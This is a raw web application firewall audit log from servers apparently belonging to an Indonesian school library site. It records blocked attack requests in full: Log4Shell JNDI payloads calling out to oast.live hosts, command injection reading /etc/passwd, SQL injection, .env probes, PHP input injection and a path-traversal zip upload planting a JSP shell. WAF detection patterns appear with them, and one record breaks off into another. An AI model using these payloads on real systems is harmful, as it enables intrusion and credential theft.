${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0qa44pgpeoi1bmoheagj9yyet6wrmggo.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0qa44pgpeoi1bmoheagzgaqx6nmoz4ao.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheag1y853r5dy4s6r.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheagqcuku8axoiuks.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheagjbo6uutibpq4o.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheagbs5ys5hhnqd8i.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0qa44pgpeoi1bmoheag3f17w8inhaeko.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0qa44pgpeoi1bmoheagwhg5kersfdxg8.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheaghtrxwysesgsmr.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagfwwxaw68ad75w.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheagincabgkayuodt.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheagwim7hbb6saiu3.oast.live} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0qa44pgpeoi1bmoheag3t9619n6gk86y.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0qa44pgpeoi1bmoheaggpw8w8e734pzw.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0qa44pgpeoi1bmoheagbbc8gjeho8sab.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168512925 --bf427f41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --bf427f41-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748331324161012 6619 (- - -) Stopwatch2: 1748331324161012 6619; combined=4642, p1=545, p2=4056, p3=0, p4=0, p5=41, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf427f41-Z-- --36573620-A-- [27/May/2025:14:35:24 +0700] aDVrPFuSH_Spa4YU2Zm1dgAAANc 103.236.140.4 45580 103.236.140.4 8181 --36573620-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168411332 --36573620-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --36573620-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36573620-E-- --36573620-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748331324198083 2161 (- - -) Stopwatch2: 1748331324198083 2161; combined=690, p1=486, p2=160, p3=0, p4=0, p5=44, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36573620-Z-- --be3e0478-A-- [27/May/2025:14:35:24 +0700] aDVrPFuSH_Spa4YU2Zm1dQAAAME 103.236.140.4 45578 103.236.140.4 8181 --be3e0478-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 159436190 --be3e0478-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --be3e0478-E-- --be3e0478-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748331324197950 2828 (- - -) Stopwatch2: 1748331324197950 2828; combined=1544, p1=391, p2=1125, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be3e0478-Z-- --c2444769-A-- [27/May/2025:14:35:44 +0700] aDVrUN6cNBpj1JOkpQlbkgAAAE8 103.236.140.4 45626 103.236.140.4 8181 --c2444769-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 159940656 --c2444769-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!M --db783e60-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db783e60-E-- --db783e60-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748331784865241 4487 (- - -) Stopwatch2: 1748331784865241 4487; combined=2933, p1=458, p2=2443, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db783e60-Z-- --30685c62-A-- [27/May/2025:14:51:45 +0700] aDVvEd6cNBpj1JOkpQlbzwAAAE4 103.236.140.4 45804 103.236.140.4 8181 --30685c62-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: sid=foo X-Varnish: 168512976 --30685c62-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --30685c62-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30685c62-E-- --30685c62-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748332305387768 3918 (- - -) Stopwatch2: 1748332305387768 3918; combined=1879, p1=551, p2=1291, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30685c62-Z-- --6d695b40-A-- [27/May/2025:14:55:32 +0700] aDVv9N6cNBpj1JOkpQlb0wAAAEc 103.236.140.4 45822 103.236.140.4 8181 --6d695b40-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 16.63.115.154 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 16.63.115.154 X-Forwarded-Proto: http Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --6d695b40-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6d695b40-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748332532798565 938 (- - -) Stopwatch2: 1748332532798565 938; combined=357, p1=312, p2=0, p3=0, p4=0, p5=45, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d695b40-Z-- --e83f4e1b-A-- [27/May/2025:15:13:25 +0700] aDV0Jd6cNBpj1JOkpQlb5AAAAEY 103.236.140.4 45888 103.236.140.4 8181 --e83f4e1b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.29.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.29.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e83f4e1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e83f4e1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748333605541274 785 (- - -) Stopwatch2: 1748333605541274 785; combined=308, p1=268, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e83f4e1b-Z-- --0c7fb66d-A-- [27/May/2025:15:36:21 +0700] aDV5hd6cNBpj1JOkpQlcYgAAAFU 103.236.140.4 46436 103.236.140.4 8181 --0c7fb66d-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: sid=foo X-Varnish: 163550297 --0c7fb66d-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --0c7fb66d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7fb66d-E-- --0c7fb66d-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748334981389957 3434 (- - -) Stopwatch2: 1748334981389957 3434; combined=1746, p1=506, p2=1209, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7fb66d-Z-- --d45c284c-A-- [27/May/2025:15:36:21 +0700] aDV5hWTuEZUBy5rh0saJlQAAAAc 103.236.140.4 46448 103.236.140.4 8181 --d45c284c-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168513327 --d45c284c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d45c284c-E-- --d45c284c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748334981410268 2503 (- - -) Stopwatch2: 1748334981410268 2503; combined=1424, p1=330, p2=1066, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d45c284c-Z-- --af3cf007-A-- [27/May/2025:15:36:21 +0700] aDV5hWTuEZUBy5rh0saJlgAAABc 103.236.140.4 46448 103.236.140.4 8181 --af3cf007-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 163550303 --af3cf007-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --af3cf007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af3cf007-E-- --af3cf007-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748334981427531 1835 (- - -) Stopwatch2: 1748334981427531 1835; combined=547, p1=398, p2=120, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af3cf007-Z-- --80e4ac4a-A-- [27/May/2025:15:36:22 +0700] aDV5hluSH_Spa4YU2Zm1iAAAAMw 103.236.140.4 46454 103.236.140.4 8181 --80e4ac4a-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0qa44pgpeoi1bmoheag1y5ef8chjpo69.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0qa44pgpeoi1bmoheagxfyourkw6jify.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0qa44pgpeoi1bmoheagykpgxnbeep53n.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheagbtp53c1uffo8g.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheagnqp9ync6qecnf.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheag3qn9gnkpk84s3.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheag3jxy6mkx658sp.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0qa44pgpeoi1bmoheagbf5tgqkmbbgrc.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0qa44pgpeoi1bmoheagi3wa6heamks4n.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheag5onwrmf61pdo3.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagwgsfwyu695154.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheag3t8z5c915co84.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheaga71ufpbqs44ru.oast.live} X-Origin: ${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0qa44pgpeoi1bmoheagcscnx7o8tjiz8.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0qa44pgpeoi1bmoheag9zceqy4warq1r.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0qa44pgpeoi1bmoheagbmgzufdqqtxbh.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168513330 --80e4ac4a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --80e4ac4a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748334982411282 5554 (- - -) Stopwatch2: 1748334982411282 5554; combined=4198, p1=379, p2=3784, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e4ac4a-Z-- --a727d544-A-- [27/May/2025:15:39:28 +0700] aDV6QN6cNBpj1JOkpQlcdQAAAEA 103.236.140.4 46538 103.236.140.4 8181 --a727d544-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 163053630 --a727d544-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --f29ba104-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29ba104-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748339690392473 5485 (- - -) Stopwatch2: 1748339690392473 5485; combined=3746, p1=476, p2=3239, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29ba104-Z-- --98fb5039-A-- [27/May/2025:16:54:50 +0700] aDWL6luSH_Spa4YU2Zm3EAAAAMM 103.236.140.4 51042 103.236.140.4 8181 --98fb5039-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: 